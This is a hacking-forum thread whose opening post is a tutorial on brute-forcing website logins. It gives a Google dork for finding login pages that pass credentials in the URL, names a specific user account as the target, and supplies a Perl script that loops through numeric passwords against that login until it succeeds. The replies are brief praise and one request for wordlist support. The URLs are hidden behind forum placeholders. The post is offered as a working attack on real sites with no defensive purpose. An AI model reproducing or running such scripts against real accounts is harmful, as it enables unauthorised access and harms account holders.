Bruteforce Tutorial.[Dictationary Attacks]

[c0rrupter]

In this tutorial I will show you how to Dictionary Attack & Bruteforce logins using Scripts.The way the script hacks the site is setting variable's in the URL which are then recieved by the website's PHP scripts.

First here are a few google dorks that you can use to find vulnerable sites:
Code:
inurl:"login.php?username="

So Ive now found my site:


Code:

Please, Log in or Register to view URLs content!

We now know that there is a user called 'dhudha08' and Its appears he likes to use a mixture of numbers for his password.

Now we will use dorks to attempt to find more users...
Code:
inurl:

Please, Log in or Register to view URLs content!

Unfortunately we dont manage to find any more users so now Its time to create are script.

Here's mine in perl I will be using numbers because of the password that we attempted to login with:
Code:
#!usr/bin/perl
#

Please, Log in or Register to view URLs content!

use LWP::Simple;
$pass=0;
$fail=get("

Please, Log in or Register to view URLs content!

");
while(1==1){
$test=get("

Please, Log in or Register to view URLs content!

".$pass);
if ($test eq $fail){
system("cls");
print $pass;
}
else{
print "Password is:$pass\n";
system("pause>nul");
}
$pass=$pass+1;
}
Now open your program it will start a dictionary attack against the site!

 

[sinn3r]

how can i put my own passfile ?

 

[Bgm268]

great

 

[bjrdasilva97]

thanks man

 

[Bgm268]

woooow!

 

[Huudeldoodel]

amazing share

 

[deidara46]

+1 rep

 

[kamleas]

nicee

 

[Dankweed]

+1 rep

 

[gull0x8]

rep user